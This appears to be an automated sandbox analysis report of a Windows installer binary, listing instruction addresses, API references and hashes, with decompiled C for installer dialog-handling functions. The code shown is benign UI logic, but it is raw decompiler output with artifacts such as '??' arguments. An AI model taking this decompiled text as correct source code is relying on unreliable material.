                                            0x004050f1
                                            0x004050f7
                                            0x004050fd
                                            0x00405103
                                            0x00405103
                                            0x00405110
                                            0x00405270
                                            0x00405277
                                            0x00405294
                                            0x0040529a
                                            0x004052ac
                                            0x004052ac
                                            0x00000000
                                            0x00405116
                                            0x00405118
                                            0x0040511d
                                            0x00405122
                                            0x00405127
                                            0x00405129
                                            0x00405129
                                            0x0040512a
                                            0x0040512b
                                            0x0040512d
                                            0x0040512d
                                            0x00405135
                                            0x00405176
                                            0x00405178
                                            0x00405188
                                            0x0040518b
                                            0x00405190
                                            0x00405197
                                            0x0040519a
                                            0x0040523c
                                            0x00405244
                                            0x0040524c
                                            0x0040524c
                                            0x00405252
                                            0x0040525a
                                            0x0040526b
                                            0x0040526b
                                            0x00000000
                                            0x0040525a
                                            0x004051a0
                                            0x004051a3
                                            0x004051a9
                                            0x004051ae
                                            0x004051b0
                                            0x004051b2
                                            0x004051b8
                                            0x004051bf
                                            0x004051c4
                                            0x004051cb
                                            0x004051ce
                                            0x004051ce
                                            0x004051d5
                                            0x004051e1
                                            0x004051e5
                                            0x004051e7
                                            0x004051e7
                                            0x004051d7
                                            0x004051d9
                                            0x004051d9
                                            0x00405207
                                            0x00405213
                                            0x00405222
                                            0x00405222
                                            0x00405224
                                            0x00405227
                                            0x00405230
                                            0x00000000
                                            0x00405137
                                            0x00405142
                                            0x00405145
                                            0x0040514a
                                            0x0040514c
                                            0x00405150
                                            0x00405160
                                            0x0040516a
                                            0x0040516c
                                            0x0040516f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405152
                                            0x00405152
                                            0x00405158
                                            0x0040515a
                                            0x0040515a
                                            0x0040515b
                                            0x0040515c
                                            0x00000000
                                            0x00405152
                                            0x00405135
                                            0x00405110
                                            0x00405053
                                            0x00000000
                                            0x00405069
                                            0x00405073
                                            0x00405078
                                            0x00000000
                                            0x00000000
                                            0x0040508a
                                            0x0040508f
                                            0x0040509b
                                            0x0040509b
                                            0x0040509d
                                            0x004050ac
                                            0x004050ae
                                            0x004050b2
                                            0x004050b5
                                            0x00000000
                                            0x004050b5
                                            0x00405053
                                            0x00404d07
                                            0x00404d0a
                                            0x00404d0d
                                            0x00404d1d
                                            0x00404d30
                                            0x00404d3b
                                            0x00404d41
                                            0x00404d4f
                                            0x00404d62
                                            0x00404d67
                                            0x00404d72
                                            0x00404d7b
                                            0x00404d91
                                            0x00404da1
                                            0x00404dad
                                            0x00404dad
                                            0x00404db2
                                            0x00404db8
                                            0x00404dba
                                            0x00404dbd
                                            0x00404dc2
                                            0x00404dc7
                                            0x00404dc9
                                            0x00404dc9
                                            0x00404de9
                                            0x00404de9
                                            0x00404deb
                                            0x00404dec
                                            0x00404df1
                                            0x00404df7
                                            0x00404dfb
                                            0x00404e00
                                            0x00404e08
                                            0x00404e0c
                                            0x00404e11
                                            0x00404e16
                                            0x00404e1e
                                            0x00404e21
                                            0x00404ef0
                                            0x00404f03
                                            0x00000000
                                            0x00404e27
                                            0x00404e2a
                                            0x00404e2d
                                            0x00404e30
                                            0x00404e30
                                            0x00404e35
                                            0x00404e3e
                                            0x00404e41
                                            0x00404e45
                                            0x00404e48
                                            0x00404e4b
                                            0x00404e54
                                            0x00404e5d
                                            0x00404e60
                                            0x00404e63
                                            0x00404e66
                                            0x00404ea4
                                            0x00404ecf
                                            0x00404ea6
                                            0x00404eb5
                                            0x00404eb5
                                            0x00404e68
                                            0x00404e6b
                                            0x00404e79
                                            0x00404e83
                                            0x00404e8b
                                            0x00404e92
                                            0x00404e9d
                                            0x00404e9d
                                            0x00404e66
                                            0x00404ed5
                                            0x00404ed6
                                            0x00404ee2
                                            0x00404ee2
                                            0x00404eee
                                            0x00404f09
                                            0x00404f0c
                                            0x00404f29
                                            0x00000000
                                            0x00404f0e
                                            0x00404f13
                                            0x00404f1c
                                            0x004052ae
                                            0x004052c0
                                            0x004052c0
                                            0x00404f0c
                                            0x00000000
                                            0x00404eee
                                            0x00404e21

                                            APIs
                                            • GetDlgItem.USER32 ref: 00404CC8
                                            • GetDlgItem.USER32 ref: 00404CD5
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
                                            • LoadImageA.USER32 ref: 00404D3B
                                            • SetWindowLongA.USER32 ref: 00404D55
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404D91
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404D9D
                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DAD
                                            • DeleteObject.GDI32(00000110), ref: 00404DB2
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404DDD
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404DE9
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404E83
                                            • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EB3
                                              • Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EC7
                                            • GetWindowLongA.USER32 ref: 00404EF5
                                            • SetWindowLongA.USER32 ref: 00404F03
                                            • ShowWindow.USER32(?,00000005), ref: 00404F13
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040500E
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405073
                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405088
                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050AC
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050CC
                                            • ImageList_Destroy.COMCTL32(?), ref: 004050E1
                                            • GlobalFree.KERNEL32 ref: 004050F1
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040516A
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00405213
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405222
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
                                            • ShowWindow.USER32(?,00000000), ref: 0040529A
                                            • GetDlgItem.USER32 ref: 004052A5
                                            • ShowWindow.USER32(00000000), ref: 004052AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 2564846305-813528018
                                            • Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                            • Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
                                            • Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                            • Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403DD8, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d38 = _t35;
					if(_t116 == 0x110) {
						 *0x424748 = _t126;
						 *0x420d4c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fd18 = _t92;
						E004042AC(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
						 *0x423f0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d38 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424780;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004042F8(0x40b);
						while(1) {
							_t37 =  *0x420d38;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x424784;
							if(_t39 ==  *0x424784) {
								E0040140B(1);
							}
							__eflags =  *0x423f0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042AC(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247ec - _t134;
							_v32 = _t49;
							if( *0x4247ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042CE(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fd18, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247ec - _t134;
							if( *0x4247ec == _t134) {
								_push( *0x420d4c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fd18);
							}
							E004042E1();
							E00406228(0x420d50, E00403DB9());
							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d50);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423f18);
									 *0x420528 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x423f18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042AC(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x423f0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423f18, 8);
									E004042F8(0x405);
									goto L58;
								}
								__eflags =  *0x4247ec - _t134;
								if( *0x4247ec != _t134) {
									goto L61;
								}
								__eflags =  *0x4247e0 - _t134;
								if( *0x4247e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423f18);
						 *0x424748 = _t134;
						EndDialog(_t126,  *0x420120);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423f18, 0x40f, 0, 1);
						__eflags =  *0x423f0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404313(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423f18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247ec - _t134;
										if( *0x4247ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x420120 = 1;
											L21:
											_push(0x78);
											L22:
											E00404285();
											goto L26;
										}
										E0040140B(_t128);
										 *0x420120 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423f18);
						 *0x423f18 = _a12;
						L58:
						if( *0x421d50 == _t134) {
							_t143 =  *0x423f18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x421d50 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                            0x00403de1
                                            0x00403dea
                                            0x00403f2b
                                            0x00403f2f
                                            0x00403f33
                                            0x00403f35
                                            0x00403f3a
                                            0x00403f45
                                            0x00403f50
                                            0x00403f55
                                            0x00403f57
                                            0x00403f59
                                            0x00403f5c
                                            0x00403f61
                                            0x00403f6f
                                            0x00403f7c
                                            0x00403f83
                                            0x00403f83
                                            0x00403f84
                                            0x00403f84
                                            0x00403f89
                                            0x00403f8f
                                            0x00403f96
                                            0x00403f9c
                                            0x00403f9e
                                            0x00403fde
                                            0x00403fe3
                                            0x00403fe8
                                            0x00403fe8
                                            0x00403fed
                                            0x00403ff6
                                            0x00403ff8
                                            0x00403ffd
                                            0x00404003
                                            0x00404007
                                            0x00404007
                                            0x0040400c
                                            0x00404012
                                            0x00000000
                                            0x00000000
                                            0x0040401d
                                            0x00404023
                                            0x00000000
                                            0x00000000
                                            0x0040402c
                                            0x00404034
                                            0x00404039
                                            0x0040403c
                                            0x00404042
                                            0x00404047
                                            0x0040404a
                                            0x00404050
                                            0x00404055
                                            0x00404058
                                            0x0040405e
                                            0x00404066
                                            0x0040406c
                                            0x00404072
                                            0x00404076
                                            0x0040407d
                                            0x0040407d
                                            0x0040407d
                                            0x00404087
                                            0x00404099
                                            0x004040a5
                                            0x004040aa
                                            0x004040b4
                                            0x004040ba
                                            0x004040bc
                                            0x004040c1
                                            0x004040be
                                            0x004040be
                                            0x004040be
                                            0x004040d1
                                            0x004040e9
                                            0x004040eb
                                            0x004040f1
                                            0x00404106
                                            0x004040f3
                                            0x004040fc
                                            0x004040fe
                                            0x004040fe
                                            0x0040410c
                                            0x0040411d
                                            0x0040412e
                                            0x00404135
                                            0x0040413f
                                            0x00404144
                                            0x00404146
                                            0x00000000
                                            0x0040414c
                                            0x0040414c
                                            0x0040414e
                                            0x00000000
                                            0x00000000
                                            0x00404154
                                            0x00404158
                                            0x0040417d
                                            0x00404183
                                            0x00404189
                                            0x0040418b
                                            0x00000000
                                            0x00000000
                                            0x004041b1
                                            0x004041b7
                                            0x004041b9
                                            0x004041be
                                            0x00000000
                                            0x00000000
                                            0x004041c4
                                            0x004041c7
                                            0x004041ca
                                            0x004041e1
                                            0x004041ed
                                            0x00404206
                                            0x00404210
                                            0x00404215
                                            0x0040421b
                                            0x00000000
                                            0x00000000
                                            0x00404225
                                            0x00404230
                                            0x00000000
                                            0x00404230
                                            0x0040415a
                                            0x00404160
                                            0x00000000
                                            0x00000000
                                            0x00404166
                                            0x0040416c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404172
                                            0x00404146
                                            0x0040423d
                                            0x00404249
                                            0x00404250
                                            0x00000000
                                            0x00403fa0
                                            0x00403fa0
                                            0x00403fa3
                                            0x00403fd6
                                            0x00403fd6
                                            0x00403fd8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403fd8
                                            0x00403fa9
                                            0x00403fae
                                            0x00403fb0
                                            0x00000000
                                            0x00000000
                                            0x00403fc0
                                            0x00403fc8
                                            0x00000000
                                            0x00403fce
                                            0x00403dfc
                                            0x00403dfc
                                            0x00403e00
                                            0x00403e05
                                            0x00403e14
                                            0x00403e14
                                            0x00403e1d
                                            0x00403e26
                                            0x00403e31
                                            0x00403e31
                                            0x00403e3d
                                            0x00403e59
                                            0x00403e5c
                                            0x00403e6f
                                            0x00403e75
                                            0x00403f18
                                            0x00000000
                                            0x00403f21
                                            0x00403e7b
                                            0x00403e88
                                            0x00403e8a
                                            0x00403e8c
                                            0x00403eab
                                            0x00403eab
                                            0x00403eae
                                            0x00403eb3
                                            0x00403eb6
                                            0x00403ec6
                                            0x00403ec7
                                            0x00403ec9
                                            0x00403eff
                                            0x00403f12
                                            0x00000000
                                            0x00403f12
                                            0x00403ecb
                                            0x00403ed1
                                            0x00403eea
                                            0x00403eef
                                            0x00403ef1
                                            0x00000000
                                            0x00000000
                                            0x00403ef3
                                            0x00403edf
                                            0x00403edf
                                            0x00403ee1
                                            0x00403ee1
                                            0x00000000
                                            0x00403ee1
                                            0x00403ed4
                                            0x00403ed9
                                            0x00000000
                                            0x00403ed9
                                            0x00403eb8
                                            0x00403ebe
                                            0x00000000
                                            0x00000000
                                            0x00403ec0
                                            0x00000000
                                            0x00403ec0
                                            0x00403eb0
                                            0x00000000
                                            0x00403eb0
                                            0x00403e96
                                            0x00403e9d
                                            0x00403ea3
                                            0x00403ea5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403ea5
                                            0x00403e61
                                            0x00000000
                                            0x00403e3f
                                            0x00403e45
                                            0x00403e4f
                                            0x00404256
                                            0x0040425c
                                            0x0040425e
                                            0x00404264
                                            0x00404269
                                            0x0040426f
                                            0x0040426f
                                            0x00404264
                                            0x00404279
                                            0x00000000
                                            0x00404279
                                            0x00403e3d

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
                                            • ShowWindow.USER32(?), ref: 00403E31
                                            • DestroyWindow.USER32 ref: 00403E45
                                            • SetWindowLongA.USER32 ref: 00403E61
                                            • GetDlgItem.USER32 ref: 00403E82
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403E96
                                            • IsWindowEnabled.USER32(00000000), ref: 00403E9D
                                            • GetDlgItem.USER32 ref: 00403F4B
                                            • GetDlgItem.USER32 ref: 00403F55
                                            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F6F
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FC0
                                            • GetDlgItem.USER32 ref: 00404066
                                            • ShowWindow.USER32(00000000,?), ref: 00404087
                                            • EnableWindow.USER32(?,?), ref: 00404099
                                            • EnableWindow.USER32(?,?), ref: 004040B4
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040CA
                                            • EnableMenuItem.USER32 ref: 004040D1
                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004040E9
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004040FC
                                            • lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
                                            • SetWindowTextA.USER32(?,00420D50), ref: 00404135
                                            • ShowWindow.USER32(?,0000000A), ref: 00404269
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                            • String ID: PB
                                            • API String ID: 184305955-3196168531
                                            • Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                            • Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
                                            • Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                            • Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404417, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41fd1c =  *0x41fd1c + 1;
								__eflags =  *0x41fd1c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404313(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4236e0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									_t40 =  &_v8; // 0x4236e0
									E004046BB(_a4,  *_t40);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424748, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424748, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41fd1c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x420528 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404697();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x423f1c; // 0x77c7ec
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x424798;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004043E2;
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E004042AC(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E004042E1(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x424754 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41fd1c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41fd1c = 0;
					return 0;
				}
			}



















                                            0x00404427
                                            0x00404539
                                            0x0040454c
                                            0x004045a8
                                            0x004045a8
                                            0x004045ac
                                            0x00404672
                                            0x00404679
                                            0x0040467b
                                            0x0040467b
                                            0x0040467b
                                            0x00404681
                                            0x00404681
                                            0x00404684
                                            0x00000000
                                            0x0040468b
                                            0x004045ba
                                            0x004045bc
                                            0x004045bf
                                            0x004045c6
                                            0x004045c8
                                            0x004045cf
                                            0x004045d1
                                            0x004045d4
                                            0x004045d7
                                            0x004045dc
                                            0x004045e2
                                            0x004045e5
                                            0x004045ec
                                            0x004045fa
                                            0x00404612
                                            0x00404614
                                            0x00404616
                                            0x0040461c
                                            0x0040462b
                                            0x0040462d
                                            0x0040462d
                                            0x004045ec
                                            0x004045cf
                                            0x00404630
                                            0x00404637
                                            0x00000000
                                            0x00404639
                                            0x00404639
                                            0x00404640
                                            0x00000000
                                            0x00000000
                                            0x00404642
                                            0x00404646
                                            0x00404657
                                            0x00404657
                                            0x00404659
                                            0x0040465d
                                            0x0040466b
                                            0x0040466b
                                            0x00000000
                                            0x0040466f
                                            0x00404637
                                            0x00404554
                                            0x00404557
                                            0x00000000
                                            0x00000000
                                            0x0040455f
                                            0x00404565
                                            0x00000000
                                            0x00000000
                                            0x00404571
                                            0x00404574
                                            0x00404577
                                            0x00000000
                                            0x00000000
                                            0x0040459a
                                            0x0040459a
                                            0x0040459c
                                            0x0040459e
                                            0x004045a3
                                            0x00000000
                                            0x0040442d
                                            0x0040442d
                                            0x00404430
                                            0x00404435
                                            0x00404437
                                            0x00404446
                                            0x00404446
                                            0x0040444d
                                            0x00404450
                                            0x00404452
                                            0x00404457
                                            0x00404460
                                            0x00404466
                                            0x00404472
                                            0x00404475
